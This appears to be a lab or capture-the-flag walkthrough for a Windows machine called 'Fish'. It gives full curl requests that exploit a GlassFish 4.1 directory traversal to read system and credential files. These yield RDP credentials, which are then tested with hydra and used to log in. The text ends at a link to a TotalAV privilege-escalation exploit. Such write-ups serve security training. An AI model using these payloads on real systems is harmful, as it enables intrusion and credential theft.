Fish

Nmap

nmap 192.168.213.168 -sS -sV -p- -Pn

PORT     STATE SERVICE              VERSION
3389/tcp open  ms-wbt-server?
3700/tcp open  giop                 CORBA naming service
4848/tcp open  http                 Sun GlassFish Open Source Edition  4.1
6060/tcp open  x11?
7676/tcp open  java-message-service Java Message Service 301
7680/tcp open  pando-pub?
8080/tcp open  http                 Sun GlassFish Open Source Edition  4.1
8181/tcp open  ssl/http             Sun GlassFish Open Source Edition  4.1
8686/tcp open  sun-as-jmxrmi?

Starting out we begin using searchsploit to discover know vulnerabilities against the services.

searchsploit -w "GlassFish 4.1"

Looks like the of GlassFish running is vulnerable to Directory Traversal. The following exploit examples can be used to read known system files.

ExploitDB: https://www.exploit-db.com/exploits/39441

Using one of the examples in the link with the correct IP and port we are able to build a curl GET request to confirm the directory traversal.

curl http://<IP>:4848/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini 

After this I looked up configuration files for GlassFish to see if we can read any sensitive credential files. This StackOverflow link proved to be informative and I was able to read the admin hash for GlassFish with a little bit of guesswork.

curl http://<IP>:4848/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../glassfish4/glassfish/domains/domain1/config/admin-keyfileadmin

Unfortunately however, I was unable to crack the hash and proceed with anything meaningful for now.

Looking through the rest of the open ports manually we come across the page "SynaMan" which we observe is running version 4.0.

Again, with searchsploit we are able to see if the version running is vulnerable.

searchsploit -w "SynaMan 4.0"

The SMTP disclosure is interesting to us:

ExploitDB: https://www.exploit-db.com/exploits/45387

We see from the description that as we already have a directory traversal exploit on the system we can likely read the desired AppConfig.xml

curl http://<IP>:4848/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../SynaMan/config/AppConfig.xml   

From the output we are able to tie together the following credentials:

arthur:KingOfAtlantis

Being as RDP is open a quick check with Hydra confirms the credentials are valid.

hydra -l "arthur" -p "KingOfAtlantis" rdp://<IP> 

We can then connect via RDP to the target system.

xfreerdp /u:"arthur" /p:"KingOfAtlantis" +clipboard /v:<IP>

We see on the desktop a shortcut for the AV application TotalAV. Checking appwiz.cpl we see that the installed version is 4.14.31.

searchsploit again shows a vulnerability with the installed version.

searchsploit -w "TotalAV 4.14.31"

This version of TotalAV appears to be vulnerable to Privilege Escalation.

ExploitDB: https://www.exploit-db.com/exploits/47897

Youtube: https://www.youtube.com/watch?v=88qeaLq98Gc